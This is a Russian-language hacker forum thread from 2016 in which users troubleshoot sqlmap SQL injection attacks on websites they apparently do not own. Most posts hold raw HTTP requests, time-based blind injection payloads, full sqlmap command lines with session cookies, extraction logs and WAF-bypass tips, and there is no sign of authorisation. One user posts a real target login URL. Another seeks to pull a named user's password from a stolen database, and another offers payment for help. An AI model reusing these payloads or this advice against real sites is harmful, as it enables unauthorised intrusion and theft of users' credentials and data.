Keep-Alive: timeout=5, max=64

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

BabaDook
23.11.2016, 17:50
RWD said:
↑ (https://antichat.live/posts/4016589/)
привет
как вот такое крутить в sqlmap
Request
GET /authenticate.php HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: wwwl.accuweather.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
HTTP/1.1 302 Found
Date: Wed, 23 Nov 2016 12:55:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: error.php?url=&mt=
Content-Length: 43
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


cкулмап -у site/authenticate.php --хедер'реферер*'

Mister_Bert0ni
23.11.2016, 19:26
.SpoilerTarget" type="button">Spoiler: Список_параметров_для_фазз нга
--level=2 // фазит Cookie header

--level=3 // фазит User-Agent header, и Refererзаголовки

--level=5 // фазит Host header
Ну а в твоем случае,так как написали Выше

Используй астерикс (*)

--user-agent="sqlmap*" // тест иньекции в user-agent

--referer="target.com*" //тест иньекци в referer

--headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*"

--headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader

Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt

-r request.txt

passwd
25.11.2016, 03:08
Подскажите почему так происходит и как это можно обойти.

Начал раскручивать /page.aspx?id=1

Вот так выглядел запрос:


Code:
--random-agent --time-sec 20

Ответ "connection timed out", даже если добавить --hpp

http://savepic.ru/12338146.png

Затем попробовал добавить tamper:


Code:
--hpp --tamper=charunicodeencode,percentage,chardoubleenco de --random-agent --time-sec 20

В итоге "500 internal server error":

.SpoilerTarget" type="button">Spoiler: Image with --tamper
http://savepic.ru/12344290.png

Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.

.SpoilerTarget" type="button">Spoiler: Image --banner
http://savepic.ru/12342242.png

Но вся проблема теперь состоит в том, что не хочет отображать таблицы.


Code:
-D *** --tables


.SpoilerTarget" type="button">Spoiler: Image --tables
http://savepic.ru/12332002.png
Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:

.SpoilerTarget" type="button">Spoiler: Image --hpp --parse-errors
http://savepic.ru/12330978.png
Та же проблема если использовать --common-tables:

.SpoilerTarget" type="button">Spoiler: Image --common-tables
http://savepic.ru/12335074.png

Как такое можно обойти?

t0ma5
25.11.2016, 13:59
passwd said:
↑ (https://antichat.live/posts/4017322/)
Подскажите почему так происходит и как это можно обойти.
Начал раскручивать /page.aspx?id=1
Вот так выглядел запрос:

Code:
--random-agent --time-sec 20

Ответ "connection timed out", даже если добавить --hpp
http://savepic.ru/12338146.png
Затем попробовал добавить tamper:

Code:
--hpp --tamper=charunicodeencode,percentage,chardoubleenco de --random-agent --time-sec 20

В итоге "500 internal server error":
Spoiler: Image with --tamper
http://savepic.ru/12344290.png
Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.
Spoiler: Image --banner
http://savepic.ru/12342242.png
Но вся проблема теперь состоит в том, что не хочет отображать таблицы.

Code:
-D *** --tables

Spoiler: Image --tables
http://savepic.ru/12332002.png
Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:
Spoiler: Image --hpp --parse-errors
http://savepic.ru/12330978.png
Та же проблема если использовать --common-tables:
Spoiler: Image --common-tables
http://savepic.ru/12335074.png
Как такое можно обойти?


если оно само заработало, может на сервере ограничение запросов в минуту например?

попробуй --delay=2 выставить, ну попытка не пытка

passwd
26.11.2016, 00:09
t0ma5 said:
↑ (https://antichat.live/posts/4017394/)
если оно само заработало, может на сервере ограничение запросов в минуту например?
попробуй --delay=2 выставить, ну попытка не пытка


Попробовал, каждый раз с раного IP.


Code:
--dbms="Microsoft SQL Server 2014" --os="Windows" --random-agent --time-sec 10 --delay=10 --no-cast --parse-errors --tables --hpp

В ответ:


Code:
[15:04:50] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: String or binary data would be truncated'

без --hpp:


Code:
[15:06:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)

с --tamper=почти любые:


Code:
[10:49:14] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases

Далее пробовал самостоятельно подставлять -T [user] -C password и т.д.:


Code:
[12:31:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Invalid object name 'database_Name.dbo.tbl_Users''

Пробовал брутить с помощью --common-tables, на каждый запрос:


Code:
[12:55:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:55:00] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Incorrect syntax near '-''

bustudo
29.11.2016, 10:01
sqlmap выводит сообщение:

[ERROR] possible integer casting detected (e.g. "$_mode=intval($_REQUEST['_mode'])") at the back-end web application

Что полезного несет эта информация и что следует делать дальше,дабы раскрутить инъекцию параметра как следует?

Bobrenz
29.11.2016, 11:43
Народ, вот тоже вопрос по ошибке во время раскрутки уязвимости

[10:45:46] [INFO] fetching database names

[10:45:50] [WARNING] something went wrong with full UNION technique (could be be

cause of limitation on retrieved number of entries). Falling back to partial UNI

ON technique

[10:45:53] [WARNING] the SQL query provided does not return any output

[10:45:53] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

может кто подскажет как такое обойти

RWD
07.12.2016, 01:06
Есть ли актуальные тамперы для cloudflare?

madam
07.12.2016, 19:23
Подскажите Blind SQL Injection

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=&password=&login=Login

уязвимы оба параметра username,password


'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

перебором вытащила

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable

sqlmap.py -u https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T

Пробовала уже по всякому ,Sqlmap не может найти Inj

Что я делаю не так?

могу скинуть сайт, если подскажете

elvir
07.12.2016, 20:23
Здравствуйте помогите с этим.

.SpoilerTarget" type="button">Spoiler
sqlmap identified the following injection point(s) with a total of 457 HTTP(s) requests:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0

current user is DBA: False

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0

current database: None

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0
При попытке извелечь бд. Появляется такая ошибка:

sqlmap error unable to retrieve the number of databases

что делать? Название БД я знаю. Но sqlmap не может найти.?

Zen1T21
07.12.2016, 23:50
madam said:
↑ (https://antichat.live/posts/4021829/)
Подскажите Blind SQL Injection
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=&password=&login=Login

уязвимы оба параметра username,password

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
перебором вытащила
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable
sqlmap.py -u
https://site.com/admin/login/
--data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T
Пробовала уже по всякому ,Sqlmap не может найти Inj
Что я делаю не так?
могу скинуть сайт, если подскажете


Скинь уже гребаную ссылку

madam
08.12.2016, 00:27
Zen1T21 said:
↑ (https://antichat.live/posts/4021952/)
Скинь уже гребаную ссылку


https: //simplecoin. cz/admin/login/

PoliGroS
08.12.2016, 17:57
C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512260a8c}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting at 15:55:42
[15:55:42] [INFO] parsing HTTP request from '3.txt'
[15:55:42] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[15:55:43] [INFO] resuming back-end DBMS 'mysql'
[15:55:43] [INFO] testing connection to the target URL
[15:55:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
[15:55:44] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: submit=%c2%ee%e9%f2%e8&CookieDate=1&PassWord=g00dPa$$w0rD&Privacy=1&referer=&UserName=' AND (SELECT * FROM (SELECT(SLEEP(10)))XUFF) AND 'tyxC'='tyxC
---
[15:55:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0.12
[15:55:44] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[15:55:44] [INFO] resuming partial value: 2
[15:55:44] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[15:56:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[15:56:12] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:23] [ERROR] invalid character detected. retrying..
[15:56:34] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:45] [ERROR] invalid character detected. retrying..
[15:56:56] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:11] [ERROR] invalid character detected. retrying..
[15:57:22] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:33] [ERROR] invalid character detected. retrying..
[15:57:43] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:55] [ERROR] invalid character detected. retrying..
[15:58:05] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:16] [ERROR] unable to properly validate last character value ('7')..
7
[15:58:17] [INFO] retrieved:
[15:58:38] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:50] [ERROR] invalid character detected. retrying..
[15:59:00] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:21] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:32] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
m
[15:59:54] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
i
[16:00:29] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [ERROR] invalid character detected. retrying..


Парни помогите, что делаю не так.

t0ma5
08.12.2016, 18:16
PoliGroS said:
↑ (https://antichat.live/posts/4022193/)
Парни помогите, что делаю не так.


--time-sec=10 это таймаут, попробуй

--delay=1 это слип в секундах между запросами

а вообще уровень вербозности побольше сделай

-v 4

и посмотри что сервер отвечает

-----------

судя по payload это time-based

как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он

PoliGroS
08.12.2016, 18:58
t0ma5 said:
↑ (https://antichat.live/posts/4022206/)
--time-sec=10 это таймаут, попробуй
--delay=1 это слип в секундах между запросами
а вообще уровень вербозности побольше сделай
-v 4
и посмотри что сервер отвечает
-----------
судя по payload это time-based
как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он




C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1 --delay=1 -v 3
[16:59:47] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[16:59:47] [INFO] resumed: 27
[16:59:47] [DEBUG] performed 0 queries in 0.00 seconds
[16:59:47] [INFO] resuming partial value: mi
[16:59:47] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>64,0,10)))))IowG) AND 'gFNg'='gFNg
[16:59:47] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[17:00:34] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>96,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[17:00:45] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>112,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:46] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[17:00:47] [DEBUG] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request
[17:00:49] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>120,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:50] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>116,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:51] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>114,0,10)))))IowG) AND 'gFNg'='gFNg


Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.

t0ma5
08.12.2016, 19:32
PoliGroS said:
↑ (https://antichat.live/posts/4022220/)
Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.


вообще там должен быть код ответа сервера и заголовки, хотя может это при -v 5, не помню точно

"врятли sql запросы могут повесить бд или сам сайт" вот не стоит так заблуждаться)))

She1ter
12.12.2016, 06:13
Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?

получил я такой вывод в sqlmap:

Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#

Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).

Как использовать payload, чтобы увидеть в браузере, что сайт http://test.ru:443/post.php?id=1 (http://gds.lab:443/post.php?id=1) подвержен Sql injection?

Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается, не могу понять принцип, может и правильно делаю но мой запрос WAF блокирует?

В итоге сайт возвращает меня на главную страницу http://test.ru:443

brown
19.12.2016, 17:08
Code:
[12:47:03] [INFO] resumed: 1
[12:47:03] [INFO] retrieving the length of query output
[12:47:03] [INFO] retrieved: 1
[12:47:08] [INFO] retrieved: 1
[12:47:15] [INFO] retrieving the length of query output
[12:47:15] [INFO] retrieved: 16
[12:47:25] [INFO] retrieved: ________________
[12:47:25] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[12:47:30] [INFO] retrieved: ????????????????
[12:47:30] [INFO] retrieving the length of query output
[12:47:30] [INFO] retrieved: 2
[12:47:38] [INFO] retrieved: ??
[12:47:38] [INFO] retrieving the length of query output
[12:47:38] [INFO] retrieved: 128
[12:48:27] [INFO] retrieved: ?????????????????????????????????????????????????? ?
?????????????????????????????????????????????????? ???????????????????????????

начинаю дамп вроде все норм потом ошибка [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid

ation step in similar cases

и пошли вопросы(в чем может быть проблема?

BabaDook
19.12.2016, 17:13
She1ter said:
↑ (https://antichat.live/posts/4023446/)
Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?
получил я такой вывод в sqlmap:
Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#

Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).
Как использовать payload, чтобы увидеть в браузере, что сайт
http://test.ru:443/post.php?id=1 (http://gds.lab:443/post.php?id=1)
подвержен Sql injection?
Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается,
не могу понять принцип
, может и правильно делаю но мой запрос WAF блокирует?
В итоге сайт возвращает меня на главную страницу
http://test.ru:443


К коментарии для кого ?

А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400

п.с во всех бедах винить waf , разумно очень.

brown (https://antichat.live/members/291717/), на скрине не увидел ничего нормального, 406 - Waf

She1ter
20.12.2016, 16:51
Burp не пробовал, но разобрался, действительно синтаксис:-(

Id=-1') -- -

Спасибо

brown
20.12.2016, 20:52
BabaDook said:
↑ (https://antichat.live/posts/4026199/)
К коментарии для кого ?
А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400
п.с во всех бедах винить waf , разумно очень.
brown (https://antichat.live/members/291717/)
, на скрине не увидел ничего нормального, 406 - Waf


а как обойти?есть темперы под это?

kacergei
21.12.2016, 08:26
Подскажите как сдеать дамп в sql файл?

А то csv немножко не то

Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin

brown
21.12.2016, 09:48
kacergei said:
↑ (https://antichat.live/posts/4026901/)
Подскажите как сдеать дамп в sql файл?
А то csv немножко не то
Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin


как в sql не знаю но может поможет,--dump-format=HTML

А вообще cvs в xls и xls импортируешь в sql

kacergei
21.12.2016, 10:04
brown said:
↑ (https://antichat.live/posts/4026921/)
как в sql не знаю но может поможет,--dump-format=HTML
А вообще cvs в xls и xls импортируешь в sql


Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.

brown
21.12.2016, 10:58
kacergei said:
↑ (https://antichat.live/posts/4026928/)
Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.


посмотри какие колонки в логе

kacergei
21.12.2016, 11:00
brown said:
↑ (https://antichat.live/posts/4026939/)
посмотри какие колонки в логе


Да это все ясно, но ситуация в том что больше 100 таблиц и в каждой бывает до 40-50 колонок

а в ручную зае.... собирать

Потому и думал что может есть решение куда проще

brown
23.12.2016, 13:31
Code:
12:22:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:22:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:22:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[12:22:50] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[12:22:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
[12:25:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[12:25:10] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[12:25:13] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[12:25:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[12:25:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[12:25:23] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[12:25:26] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[12:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:25:33] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[12:25:36] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[12:25:39] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[12:27:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[12:27:55] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[12:27:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[12:28:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[12:28:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[12:28:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[12:28:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive

Подскажите как прокрутить нормльно,он вроде подсчитал количество

[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns

но потом обломился

И не хочет выдавать информационную схему

[CODE]
Code:
[12:28:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL

karkajoi
23.12.2016, 18:04
[QUOTE="brown"]
brown said:
↑ (https://antichat.live/posts/4027756/)

Code:
12:22:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:22:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:22:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[12:22:50] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[12:22:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
[12:25:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[12:25:10] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[12:25:13] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[12:25:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[12:25:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[12:25:23] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[12:25:26] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[12:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:25:33] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[12:25:36] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[12:25:39] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[12:27:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[12:27:55] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[12:27:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[12:28:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[12:28:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[12:28:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[12:28:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive

Подскажите как прокрутить нормльно,он вроде подсчитал количество
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
но потом обломился
И не хочет выдавать информационную схему
[CODE]
Code:
[12:28:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL

brown
24.12.2016, 13:30
karkajoi said:
↑ (https://antichat.live/posts/4027834/)
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
Ложно позитивная жи.


А как раскрутить?Готов заплатить

karkajoi
24.12.2016, 22:03
brown said:
↑ (https://antichat.live/posts/4028137/)
А как раскрутить?Готов заплатить


Вручную пробовать, может там вообще нету дыры.

У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.

brown
24.12.2016, 23:58
karkajoi said:
↑ (https://antichat.live/posts/4028351/)
Вручную пробовать, может там вообще нету дыры.
У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.


дыра есть, ОР болеан таблицы подберает

Shubka75
